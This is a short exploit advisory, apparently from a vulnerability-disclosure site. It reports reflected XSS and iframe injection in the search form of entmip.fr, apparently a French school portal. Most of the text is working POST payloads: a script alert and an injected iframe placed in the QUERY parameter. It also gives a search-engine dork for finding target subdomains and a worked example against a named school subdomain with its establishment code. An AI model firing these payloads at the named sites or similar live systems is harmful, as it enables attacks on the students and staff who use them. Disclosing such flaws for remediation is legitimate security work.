----------------------------------------------------------------------
[Description]
#Exploit title: Entmip Reflected XSS & Iframe injection
#Exploit author: Implosion
#Date: 18/12/2016
#Dorks: site:.entmip.fr -site:www.xxx.com
#Website: entmip.fr
#Tested on: Firefox
----------------------------------------------------------------------
[Vulnerability][Reflected XSS]
#URL: http://XXXXXX.entmip.fr/sg.do
#POST DATA: %23ECRAN_LOGIQUE%23=RECHERCHE&PROC=RECHERCHE&ACTION=VALIDER&CODE_ETABLISSEMENT=XXXX&QUERY="><script>alert('1')</script>+&x=0&y=0
----------------------------------------------------------------------
[Vulnerability][Iframe Injection]
#URL: http://XXXXXX.entmip.fr/sg.do
#POST DATA: %23ECRAN_LOGIQUE%23=RECHERCHE&PROC=RECHERCHE&ACTION=VALIDER&CODE_ETABLISSEMENT=XXXX&QUERY="><iframe src=https://cxsecurity.com>+&x=0&y=0
----------------------------------------------------------------------
[Example]
#URL: http://labarousse.entmip.fr/sg.do
#POST DATA: %23ECRAN_LOGIQUE%23=RECHERCHE&PROC=RECHERCHE&ACTION=VALIDER&CODE_ETABLISSEMENT=6469&QUERY="><script>alert('1')</script>%2B&x=0&y=0
----------------------------------------------------------------------
#Discovered By Implosion
----------------------------------------------------------------------